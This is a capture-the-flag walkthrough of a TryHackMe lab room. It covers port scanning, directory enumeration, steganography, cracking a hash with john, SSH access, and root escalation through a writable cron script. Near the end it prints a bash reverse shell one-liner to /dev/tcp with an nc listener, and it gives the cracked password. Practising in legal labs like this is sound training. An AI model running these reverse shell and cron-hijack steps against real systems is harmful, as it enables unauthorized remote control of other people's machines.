Easy Peasy — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Easy Peasy — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports.

nmap -A -T4 -p- -v <ip>

Nmap may took a long time to finish, so be patient!

nmap

Well there are 3 ports opened. First let’s access the website at port 80.

port 80

It’s a default nginx webpage. Now we will use dirbuster to scan for hidden dir of this port (or if you prefer CLI, you can use gobuster).

dirbuster

There are 2 hidden dirs: /hidden and /hidden/whatever. Let’s access the 1st one.

/hidden

It contains only this image. So maybe it’s for stego. Download the image to look for hidden data. You can find the image url using inspect element or Ctrl+U

Page source

steghide extract -sf imagename.jpg

steghide

Well looks like I cannot extract any data from this image. Let’s try the other hidden dir.

/hidden/whatever

It’s another image. Page source is always important. So let’s check it.

Page source

Well, as you can see, there is a encoded string, which maybe the password for us to extract hidden data.

Copy this string and use icyberchef.com to decode.

icyberchef

Well it’s not a password but a flag!

Maybe that’s all for us at this port 80. So let’s go to another http port: 65524.

port 65524

Well it’s a Apache default page. Scroll down and look carefully until you see the 3rd flag..

3rd flag

Now access /robots.txt to see if anything interesting.

robots.txt

Well, looks like we need to change the user-agent to get the flag. It’s a md5 hash. Let’s decrypt it by using this website: https://md5hashing.net

2nd flag

You will have the 2nd flag.

What next? Again, page source!

page source

There it’s. It’s encoded with ba…, so it will be Basexx encoded.

Again put this string to icyberchef to decode. Try all Base until you find the true one. It’s Base62

base62

Another hidden dir. Let’s access it.

Well, nicely done page! Again, Ctrl+U.

page source

You see an image and a encoded string. Download the image and decode the string to get the password.

Copy this hash to a txt file.

Download the easypeasy.txt on TryHackMe and use john to crack that hash.

john — wordlist=easypeasy.txt <your-file-name.txt>

Wait for john to finish then run this cmd to show result:

john — show <your-file-name.txt>

john

Now I’ve got the password: mypasswordforthatjob

Now use that password to extract hidden data from the image above.

steghide extract -sf binarycodepixabay.jpg

steghide

Enter the password above. Now read the secrettext.txt

secrettext

Change the password from binary to text.

Now I’ve got the password for ssh. So let’s ssh to the machine.

ssh boring@<ip> -p 6498

Enter the password and you’re in!

ssh

Get the user.txt

user.txt

It’s encoded with Rot13. So let’s decode it.

Rot13 Decoded

Now let’s get root to get the final flag!

I will use find to look for all files belong to boring

find / -type f -user boring 2>/dev/null

Scroll down and you will see a secret cronjob.

cronjob

Edit this .sh file, add this command to spawn a shell:

bash -i >& /dev/tcp/<your-host-ip>/4444 0>&1

Then start a listener on your machine:

nc -lvnp 4444

And execute this script.

Go back to your machine, now i’m root!

Find the root flag.

find / -name *.txt 2>/dev/null

find

Get your finally root flag!

root flag

The end.

HAPPY HACKING